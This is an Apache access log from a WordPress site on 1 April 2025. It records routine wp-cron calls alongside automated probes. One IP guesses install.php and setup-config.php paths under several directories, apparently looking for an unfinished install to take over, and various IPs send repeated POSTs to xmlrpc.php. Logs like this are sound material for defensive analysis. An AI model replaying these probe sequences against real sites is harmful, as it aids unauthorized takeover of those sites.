13.229.78.155 - - [01/Apr/2025:18:05:41 -0400] "GET /tes/wp-admin/setup-config.php HTTP/1.1" 404 16544 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:42 -0400] "GET /test/wp-admin/install.php?step=1 HTTP/1.1" 404 16544 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:43 -0400] "GET /test/wp-admin/setup-config.php HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:44 -0400] "GET /web/wp-admin/install.php?step=1 HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:45 -0400] "GET /web/wp-admin/setup-config.php HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:46 -0400] "GET /cms/wp-admin/install.php?step=1 HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:47 -0400] "GET /cms/wp-admin/setup-config.php HTTP/1.1" 404 16545 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:48 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 21 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
13.229.78.155 - - [01/Apr/2025:18:05:49 -0400] "GET /wp-admin/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
203.175.9.41 - - [01/Apr/2025:18:25:35 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:18:31:18 -0400] "POST /wp-cron.php?doing_wp_cron=1743546677.1391980648040771484375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
116.62.176.249 - - [01/Apr/2025:18:31:11 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
198.54.114.83 - - [01/Apr/2025:18:49:48 -0400] "POST /wp-cron.php?doing_wp_cron=1743547787.9203779697418212890625 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
2605:6f00:1234:701:1::14d - - [01/Apr/2025:18:49:46 -0400] "POST /xmlrpc.php HTTP/1.1" 200 212 "http://shahmeenaindustry.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36"
198.54.114.83 - - [01/Apr/2025:18:55:45 -0400] "POST /wp-cron.php?doing_wp_cron=1743548145.2222609519958496093750 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
2001:41d0:304:200::7518 - - [01/Apr/2025:18:55:41 -0400] "POST /xmlrpc.php HTTP/1.1" 200 236 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0"
37.139.53.46 - - [01/Apr/2025:19:07:50 -0400] "GET /cbd-shop-uk-review/ HTTP/1.1" 200 23136 "http://shahmeenaindustry.com/cbd-shop-uk-review/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 CCleaner/130.0.0.0"
198.54.114.83 - - [01/Apr/2025:19:07:56 -0400] "POST /wp-cron.php?doing_wp_cron=1743548876.4754140377044677734375 HTTP/1.1" 200 0 "-" "WordPress/6.7.2; https://shahmeenaindustry.com"
